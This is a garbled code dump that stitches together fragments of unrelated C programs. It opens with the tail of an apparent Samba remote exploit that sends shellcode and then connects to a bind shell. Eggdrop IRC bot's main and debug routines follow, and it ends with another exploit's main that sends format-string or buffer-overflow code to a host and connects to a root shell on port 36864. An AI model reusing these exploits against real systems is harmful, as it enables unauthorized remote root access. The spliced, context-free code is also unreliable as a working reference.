server Samba version doubtful ??\n **\n\n"); exit(-1); } else { fprintf(stdout," [0] Target: %s\n",plat[type].ost); fprintf(stdout," [1] Set socket.\n"); sock=(int)setsock(tg_host,ATK_PORT); (int)re_connt(sock,1); fprintf(stdout," [2] Make shellcode & Send Packet.\n"); __atk_code_send_recv(sock,shell); close(sock); fprintf(stdout," [3] Trying %s:%d.\n",tg_host,SH_PORT); sleep(2); sock=(int)setsock(tg_host,SH_PORT); (int)re_connt(sock,1); fprintf(stdout," [*] Connected to %s:%d.\n",tg_host,SH_PORT); (void)send_recv_sh(sock); } }
int main(int arg_c, char **arg_v) { int i, xx; char s[25]; FILE *f; struct sigaction sv; struct chanset_t *chan; #ifdef DEBUG struct rlimit cdlim; #endif #ifdef STOP_UAC int nvpair[2]; #endif /* Make sure it can write core, if you make debug. Else it's pretty * useless (dw) * * Only allow unlimited size core files when compiled with DEBUG defined. * This is not a good idea for normal builds -- in these cases, use the * default system resource limits instead. */ #ifdef DEBUG cdlim.rlim_cur = RLIM_INFINITY; cdlim.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &cdlim); #endif #ifdef DEBUG_CONTEXT /* Initialise context list */ for (i = 0; i < 16; i++) Context; #endif /* Include patch.h header for patch("...") */ #include "patch.h" argc = arg_c; argv = arg_v; /* Version info! */ egg_snprintf(ver, sizeof ver, "eggdrop v%s", egg_version); egg_snprintf(version, sizeof version, "Eggdrop v%s (C) 1997 Robey Pointer (C) 2010 Eggheads", egg_version); /* Now add on the patchlevel (for Tcl) */ sprintf(&egg_version[strlen(egg_version)], " %u", egg_numver); strcat(egg_version, egg_xtra); /* For OSF/1 */ #ifdef STOP_UAC /* Don't print "unaligned access fixup" warning to the user */ nvpair[0] = SSIN_UACPROC; nvpair[1] = UAC_NOPRINT; setsysinfo(SSI_NVPAIRS, (char *) nvpair, 1, NULL, 0); #endif /* Set up error traps: */ sv.sa_handler = got_bus; sigemptyset(&sv.sa_mask); #ifdef SA_RESETHAND sv.sa_flags = SA_RESETHAND; #else sv.sa_flags = 0; #endif sigaction(SIGBUS, &sv, NULL); sv.sa_handler = got_segv; sigaction(SIGSEGV, &sv, NULL); #ifdef SA_RESETHAND sv.sa_flags = 0; #endif sv.sa_handler = got_fpe; sigaction(SIGFPE, &sv, NULL); sv.sa_handler = got_term; sigaction(SIGTERM, &sv, NULL); sv.sa_handler = got_hup; sigaction(SIGHUP, &sv, NULL); sv.sa_handler = got_quit; sigaction(SIGQUIT, &sv, NULL); sv.sa_handler = SIG_IGN; sigaction(SIGPIPE, &sv, NULL); sv.sa_handler = got_ill; sigaction(SIGILL, &sv, NULL); sv.sa_handler = got_alarm; sigaction(SIGALRM, &sv, NULL); /* Initialize variables and stuff */ now = time(NULL); chanset = NULL; egg_memcpy(&nowtm, localtime(&now), sizeof(struct tm)); lastmin = nowtm.tm_min; srandom((unsigned int) (now % (getpid() + getppid()))); init_mem(); init_language(1); if (argc > 1) for (i = 1; i < argc; i++) do_arg(argv[i]); printf("\n%s\n", version); #ifndef CYGWIN_HACKS /* Don't allow eggdrop to run as root * This check isn't useful under cygwin and has been * reported to cause trouble in some situations. */ if (((int) getuid() == 0) || ((int) geteuid() == 0)) fatal("ERROR: Eggdrop will not run as root!", 0); #endif #ifndef REPLACE_NOTIFIER init_threaddata(1); #endif init_userent(); init_misc(); init_bots(); init_modules(); if (backgrd) bg_prepare_split(); init_tcl(argc, argv); init_language(0); #ifdef STATIC link_statics(); #endif strncpyz(s, ctime(&now), sizeof s); strcpy(&s[11], &s[20]); putlog(LOG_ALL, "*", "--- Loading %s (%s)", ver, s); chanprog(); if (!encrypt_pass) { printf(MOD_NOCRYPT); bg_send_quit(BG_ABORT); exit(1); } i = 0; for (chan = chanset; chan; chan = chan->next) i++; putlog(LOG_MISC, "*", "=== %s: %d channels, %d users.", botnetnick, i, count_users(userlist)); #ifdef TLS ssl_init(); #endif cache_miss = 0; cache_hit = 0; if (!pid_file[0]) egg_snprintf(pid_file, sizeof pid_file, "pid.%s", botnetnick); /* Check for pre-existing eggdrop! */ f = fopen(pid_file, "r"); if (f != NULL) { fgets(s, 10, f); xx = atoi(s); i = kill(xx, SIGCHLD); /* Meaningless kill to determine if pid * is used */ if (i == 0 || errno != ESRCH) { printf(EGG_RUNNING1, botnetnick); printf(EGG_RUNNING2, pid_file); bg_send_quit(BG_ABORT); exit(1); } } /* Move into background? */ if (backgrd) { bg_do_split(); } else { /* !backgrd */ xx = getpid(); if (xx != 0) { FILE *fp; /* Write pid to file */ unlink(pid_file); fp = fopen(pid_file, "w"); if (fp != NULL) { fprintf(fp, "%u\n", xx); if (fflush(fp)) { /* Let the bot live since this doesn't appear to be a botchk */ printf(EGG_NOWRITE, pid_file); fclose(fp); unlink(pid_file); } else fclose(fp); } else printf(EGG_NOWRITE, pid_file); } } use_stderr = 0; /* Stop writing to stderr now */ if (backgrd) { /* Ok, try to disassociate from controlling terminal (finger cross) */ #ifdef HAVE_SETPGID setpgid(0, 0); #endif /* Tcl wants the stdin, stdout and stderr file handles kept open. */ freopen("/dev/null", "r", stdin); freopen("/dev/null", "w", stdout); freopen("/dev/null", "w", stderr); #ifdef CYGWIN_HACKS FreeConsole(); #endif } /* Terminal emulating dcc chat */ if (!backgrd && term_z) { int n = new_dcc(&DCC_CHAT, sizeof(struct chat_info)); getvhost(&dcc[n].sockname, AF_INET); dcc[n].sock = STDOUT; dcc[n].timeval = now; dcc[n].u.chat->con_flags = conmask; dcc[n].u.chat->strip_flags = STRIP_ALL; dcc[n].status = STAT_ECHO; strcpy(dcc[n].nick, "HQ"); strcpy(dcc[n].host, "llama@console"); /* HACK: Workaround not to pass literal "HQ" as a non-const arg */ dcc[n].user = get_user_by_handle(userlist, dcc[n].nick); /* Make sure there's an innocuous HQ user if needed */ if (!dcc[n].user) { userlist = adduser(userlist, dcc[n].nick, "none", "-", USER_PARTY); dcc[n].user = get_user_by_handle(userlist, dcc[n].nick); } setsock(STDOUT, 0); /* Entry in net table */ dprintf(n, "\n### ENTERING DCC CHAT SIMULATION ###\n\n"); dcc_chatter(n); } then = now; online_since = now; autolink_cycle(NULL); /* Hurry and connect to tandem bots */ add_help_reference("cmds1.help"); add_help_reference("cmds2.help"); add_help_reference("core.help"); add_hook(HOOK_SECONDLY, (Function) core_secondly); add_hook(HOOK_MINUTELY, (Function) core_minutely); add_hook(HOOK_HOURLY, (Function) core_hourly); add_hook(HOOK_REHASH, (Function) event_rehash); add_hook(HOOK_PRE_REHASH, (Function) event_prerehash); add_hook(HOOK_USERFILE, (Function) event_save); add_hook(HOOK_BACKUP, (Function) backup_userfile); add_hook(HOOK_DAILY, (Function) event_logfile); add_hook(HOOK_DAILY, (Function) event_resettraffic); add_hook(HOOK_LOADED, (Function) event_loaded); call_hook(HOOK_LOADED); debug0("main: entering loop"); while (1) { mainloop(1); } }
static void write_debug() { int x; char s[25]; int y; if (nested_debug) { /* Yoicks, if we have this there's serious trouble! * All of these are pretty reliable, so we'll try these. * * NOTE: dont try and display context-notes in here, it's * _not_ safe <cybah> */ x = creat("DEBUG.DEBUG", 0644); setsock(x, SOCK_NONSOCK); if (x >= 0) { strncpyz(s, ctime(&now), sizeof s); dprintf(-x, "Debug (%s) written %s\n", ver, s); dprintf(-x, "Please report problem to [email protected]\n"); dprintf(-x, "after a visit to http://www.eggheads.org/bugzilla/\n"); dprintf(-x, "Full Patch List: %s\n", egg_xtra); dprintf(-x, "Context: "); cx_ptr = cx_ptr & 15; for (y = ((cx_ptr + 1) & 15); y != cx_ptr; y = ((y + 1) & 15)) dprintf(-x, "%s/%d,\n ", cx_file[y], cx_line[y]); dprintf(-x, "%s/%d\n\n", cx_file[y], cx_line[y]); killsock(x); close(x); } bg_send_quit(BG_ABORT); exit(1); /* Dont even try & tell people about, that may * have caused the fault last time. */ } else nested_debug = 1; putlog(LOG_MISC, "*", "* Last context: %s/%d [%s]", cx_file[cx_ptr], cx_line[cx_ptr], cx_note[cx_ptr][0] ? cx_note[cx_ptr] : ""); putlog(LOG_MISC, "*", "* Please REPORT this BUG!"); putlog(LOG_MISC, "*", "* Check doc/BUG-REPORT on how to do so."); x = creat("DEBUG", 0644); setsock(x, SOCK_NONSOCK); if (x < 0) { putlog(LOG_MISC, "*", "* Failed to write DEBUG"); } else { strncpyz(s, ctime(&now), sizeof s); dprintf(-x, "Debug (%s) written %s\n", ver, s); dprintf(-x, "Full Patch List: %s\n", egg_xtra); #ifdef STATIC dprintf(-x, "STATICALLY LINKED\n"); #endif /* info library */ dprintf(-x, "Tcl library: %s\n", ((interp) && (Tcl_Eval(interp, "info library") == TCL_OK)) ? tcl_resultstring() : "*unknown*"); /* info tclversion/patchlevel */ dprintf(-x, "Tcl version: %s (header version %s)\n", ((interp) && (Tcl_Eval(interp, "info patchlevel") == TCL_OK)) ? tcl_resultstring() : (Tcl_Eval(interp, "info tclversion") == TCL_OK) ? tcl_resultstring() : "*unknown*", TCL_PATCH_LEVEL ? TCL_PATCH_LEVEL : "*unknown*"); if (tcl_threaded()) dprintf(-x, "Tcl is threaded\n"); #ifdef IPV6 dprintf(-x, "Compiled with IPv6 support\n"); #else dprintf(-x, "Compiled without IPv6 support\n"); #endif #ifdef TLS dprintf(-x, "Compiled with TLS support\n"); #else dprintf(-x, "Compiled without TLS support\n"); #endif dprintf(-x, "Configure flags: %s\n", EGG_AC_ARGS); #ifdef CCFLAGS dprintf(-x, "Compile flags: %s\n", CCFLAGS); #endif #ifdef LDFLAGS dprintf(-x, "Link flags: %s\n", LDFLAGS); #endif #ifdef STRIPFLAGS dprintf(-x, "Strip flags: %s\n", STRIPFLAGS); #endif dprintf(-x, "Context: "); cx_ptr = cx_ptr & 15; for (y = ((cx_ptr + 1) & 15); y != cx_ptr; y = ((y + 1) & 15)) dprintf(-x, "%s/%d, [%s]\n ", cx_file[y], cx_line[y], (cx_note[y][0]) ? cx_note[y] : ""); dprintf(-x, "%s/%d [%s]\n\n", cx_file[cx_ptr], cx_line[cx_ptr], (cx_note[cx_ptr][0]) ? cx_note[cx_ptr] : ""); tell_dcc(-x); dprintf(-x, "\n"); debug_mem_to_dcc(-x); killsock(x); close(x); putlog(LOG_MISC, "*", "* Wrote DEBUG"); } }
int main(int argc,char *argv[]) { int sock,type=0; int port=(PORT); char host[256]=DEF_HOST; int sflag=platform[type].sflag; unsigned long retloc=platform[type].dtors_addr; unsigned long shell=platform[type].shell; (void)banrl(); while((sock=getopt(argc,argv,"DdF:f:R:r:S:s:H:h:T:t:Ii"))!=EOF) { extern char *optarg; switch(sock) { case 'D': case 'd': __debug_chk=1; break; case 'R': case 'r': retloc=strtoul(optarg,NULL,0); break; case 'S': case 's': shell=strtoul(optarg,NULL,0); break; case 'F': case 'f': sflag=atoi(optarg); break; case 'H': case 'h': memset((char *)host,0,sizeof(host)); strncpy(host,optarg,sizeof(host)-1); break; case 'T': case 't': type=atoi(optarg); if(type>=4){ (void)usage(argv[0]); } else { retloc=platform[type].dtors_addr; shell=platform[type].shell; sflag=platform[type].sflag; } break; case 'I': case 'i': (void)usage(argv[0]); break; case '?': fprintf(stderr,"Try `%s -i' for more information.\n\n",argv[0]); exit(-1); break; } } fprintf(stdout," #\n # target host: %s:%d\n",host,port); fprintf(stdout," # type: %s\n",platform[type].os_type); switch(type) { case 0: case 1: (int)make_fmt_code(retloc,shell,sflag); break; case 2: (int)make_bof_code(shell,sflag,0); break; case 3: (int)make_bof_code(shell,sflag,1); } fprintf(stdout," # send code size: %d byte\n",strlen(t_atk)); sock=setsock(host,port); (void)re_connt(sock); if(__debug_chk) sleep(10); send(sock,t_atk,strlen(t_atk),0); close(sock); fprintf(stdout," #\n # Waiting rootshell, Trying %s:36864 ...\n",host); sleep(1); sock=setsock(host,36864); (void)re_connt(sock); fprintf(stdout," # connected to %s:36864 !\n #\n\n",host); (void)conn_shell(sock); }